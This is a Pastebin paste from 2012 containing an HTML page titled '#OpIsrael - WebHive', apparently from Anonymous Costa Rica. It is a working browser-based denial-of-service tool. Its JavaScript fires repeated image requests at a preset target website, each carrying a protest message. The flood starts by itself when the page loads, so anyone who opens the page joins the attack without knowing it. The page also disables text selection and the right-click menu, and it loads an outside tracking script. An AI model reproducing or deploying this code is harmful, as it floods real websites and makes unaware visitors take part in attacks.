Advertisement
AnonCesc

#WebHives

Nov 29th, 2012
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.01 KB | None | 0 0
  1.  
  2.  
  3. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  4. <html xmlns="http://www.w3.org/1999/xhtml">
  5. <head>
  6. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"g"/>
  7. <link href="http://stopusagebasedbilling.files.wordpress.com/2010/12/anonymous-icon.jpg?w=700" rel="shortcut icon" type="image/x-icon" />
  8. <title>#OpIsrael - Webhive</title>
  9. <style type="text/css">
  10. body {
  11. background: url("http://www.gamingunion.net/newsimg/anonymous-to-scale-back-attacks-on-sony-due-to-consumer-backlash.jpg");
  12. background-repeat: no-repeat;
  13. background-position: center;
  14. background-attachment: fixed;
  15. background-color: #000000;
  16. margin-top: 5%;
  17. margin-bottom: 5%;
  18. margin-left: 15%;
  19. margin-right: 15%;
  20. font-family:"Courier New", Courier, monospace;
  21. color: #FFFFFF;
  22. }
  23. fieldset {
  24. border-style: none;
  25. margin: 10px;
  26. }
  27. iframe{
  28. opacity:0;
  29. width:1px;
  30. height:1px;
  31. outline:0px;
  32. }
  33. p {
  34. margin: 0;
  35. }
  36. input {
  37. margin: 0;
  38. background-color: transparent;
  39. border: none;
  40. text-align: center;
  41. font-family:"Courier New", Courier, monospace;
  42. color: #FFFFFF;
  43. }
  44. iframe{
  45. opacity:0;
  46. width:1px;
  47. height:1px;
  48. background:none;
  49. }
  50. </style>
  51. <script language="JavaScript">
  52. <!-- Disable
  53. function disableselect(e){
  54. return false
  55. }
  56. function reEnable(){
  57. return true
  58. }
  59. //if IE4+
  60. document.onselectstart=new Function ("return false")
  61. document.oncontextmenu=new Function ("return false")
  62. //if NS6
  63. if (window.sidebar){
  64. document.onmousedown=disableselect
  65. document.onclick=reEnable
  66. }
  67. //-->
  68. </script>
  69.  
  70. <script languague="JavaScript">
  71.  
  72. <!-- Begin
  73.  
  74. function popUp(URL) {
  75.  
  76. day = new Date();
  77.  
  78. id = day.getTime();
  79.  
  80. eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=550,height=550,left = 408,top = 109');");
  81.  
  82. }
  83.  
  84. -->
  85.  
  86. </script>
  87. </head>
  88. <body onLoad="type()">
  89. <fieldset>
  90. <div id="title" align="center"><font size="+3" color="#FF0000">[#</font><font size="+3">OpIsrael</font><font size="+3" color="#FF0000">] -- [</font><font size="+3">WebHive:</font><font size="+3" color="#FF0000">]</font></div><br><br>
  91. <div id="hive" align="center">
  92. <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
  93. <input name="target" id="target" size="100" value="http://www.webaatacar.com/"><br><br>
  94.  
  95. <font color="#FF0000">[</font>REQUESTS<font color="#FF0000">]</font><br>
  96. <input id="requests" size="100" value="1000"><br><br>
  97. <font color="#FF0000">[</font>MESSAGE<font color="#FF0000">]</font><br>
  98. <input id="message" size="100" value="Somos Anonymous, Somos Legion, No perdonamos, No olvidamos, Esperanos!"><br><br>
  99. <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
  100. REQUESTS <p id="requested">0</p>
  101. SUCCEEDED <p id="succeeded">0</p>
  102. FAILED <p id="failed">0</p><br>
  103. <button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255); opacity:1;">Fire</button><br><br><br>
  104. </div>
  105. <script>
  106. (function () {
  107. var fireInterval;
  108. var isFiring = false;
  109. var currentTime = new Date();
  110. var lastSuccess = currentTime.getTime();
  111.  
  112. var requestedNode = document.getElementById("requested"),
  113. succeededNode = document.getElementById("succeeded"),
  114. failedNode = document.getElementById("failed"),
  115. targetNode = document.getElementById("target"),
  116. fire = document.getElementById("fire"),
  117. messageNode = document.getElementById("message"),
  118. requestsNode = document.getElementById("requests"),
  119. timeoutNode = document.getElementById("timeout");
  120.  
  121. var target = targetNode.value;
  122. targetNode.onchange = function () {
  123. target = this.value;
  124. };
  125.  
  126. var requestsHT = {};
  127.  
  128. var requested = 0,
  129. succeeded = 0,
  130. failed = 0;
  131.  
  132. var makeHttpRequest = function () {
  133. if ( (currentTime.getTime()-lastSuccess) > 10000) {
  134. return;
  135. } else {
  136. lastSuccess = currentTime.getTime();
  137. };
  138.  
  139. var rID =Number(new Date());
  140.  
  141. var img = new Image();
  142. img.onerror = function () { onFail(rID); };
  143. img.onabort = function () { onFail(rID); };
  144. img.onload = function () { onSuccess(rID); };
  145. img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
  146. requestsHT[rID] = img;
  147. onRequest(rID);
  148. };
  149.  
  150. var onRequest = function (rID) {
  151. requested++;
  152. requestedNode.innerHTML = requested;
  153. };
  154.  
  155. var onComplete = function (rID) {
  156. delete requestsHT[rID];
  157. };
  158.  
  159. var onFail = function (rID) {
  160. // failedCtr++;
  161. //failedCtrNode.innerHTML = failedCtr;
  162. succeeded++; //Seems like the url will always fail it it isn't an image
  163. succeededNode.innerHTML = succeeded;
  164. delete requestsHT[rID];
  165. };
  166.  
  167. var onSuccess = function (rID) {
  168. succeeded++;
  169. succeededNode.innerHTML = succeeded;
  170. delete requestsHT[rID];
  171. };
  172.  
  173. fire.onclick = function () {
  174. if (isFiring) {
  175. clearInterval(fireInterval);
  176. isFiring = false;
  177. this.innerHTML = "FIRE!";
  178. } else {
  179. isFiring = false;
  180. this.innerHTML = "STOP!";
  181. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  182. }
  183. };
  184.  
  185. function start() {
  186. if (isFiring) {
  187. clearInterval(fireInterval);
  188. isFiring = false;
  189. this.innerHTML = "FIRE!";
  190. } else {
  191. isFiring = false;
  192. this.innerHTML = "STOP";
  193. fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  194. }
  195. };
  196. document.getElementById("target").value = "http://www.webaatacar.com/";
  197. start();
  198. })();
  199. </script>
  200. <div id="footer" align="center"><font color="#FF0000"># [</font>CostaRica<font color="#FF0000">] -- [</font>#AnonCR-AnonymousHacker's<font color="#FF0000">] #</font></div>
  201. </fieldset>
  202. <script type="text/javascript" src="http://www.usuarios-online.com/usuarios.php?v=www.e-viphostchile.tk/acta.html"></script> <a href="http://www.usuarios-online.com/en/">users online</a>
  203. <ifame src=" http://www.google.com " style=" opacity:0; width:0px; height:0px; outline:0px;background:none;"></iframe>
  204.  
  205. </body>
  206.  
  207. Break Security #AnonCR para #LulzSecCR y #AnonymousHacker's CostaRica
  208. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement